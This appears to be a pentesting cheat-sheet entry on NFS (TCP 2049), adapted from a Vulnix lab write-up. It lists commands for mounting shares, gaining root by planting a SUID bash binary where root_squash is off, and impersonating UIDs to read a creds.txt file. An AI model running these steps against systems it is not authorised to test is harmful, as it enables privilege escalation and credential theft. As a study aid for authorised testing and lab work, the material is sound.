TCP 2049: NFS

Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.

-- Wikipedia

Basics

Show mounts

sudo showmount -e <ip>

Mount

sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>

Privilege escalation via root_squash

When enabled (default), connected users are assigned "nfsnobody" (least local privileges). However, when turned off, one can upload a SUID binary and execute it.

e.g. using bash

# get a compatible bash binary for the target system
sudo chown root bash
sudo chmod +sx bash

On target

./bash -p

Exploitation

If permissions are "65534 / nobody", "4294967294 / UNKNOWN"

-rwx------ 1 nobody 4294967294   48 Oct 28  2019 creds.txt

Try to use nfs version 3

mount -t nfs -o vers=3 <ip>:/<share> <share>

-rwx------ 1 1014 1014   48 Oct 28  2019 creds.txt

Now all that's left is to create a user with that id, to access the file

groupadd --gid 1014 nfsgroup
useradd --uid 1014 --groups nfsgroup nfsuser
sudo -u nfsuser ls -l

Source: Write-up Vulnix - playing around with NFS - Christophe Tafani-Dereeper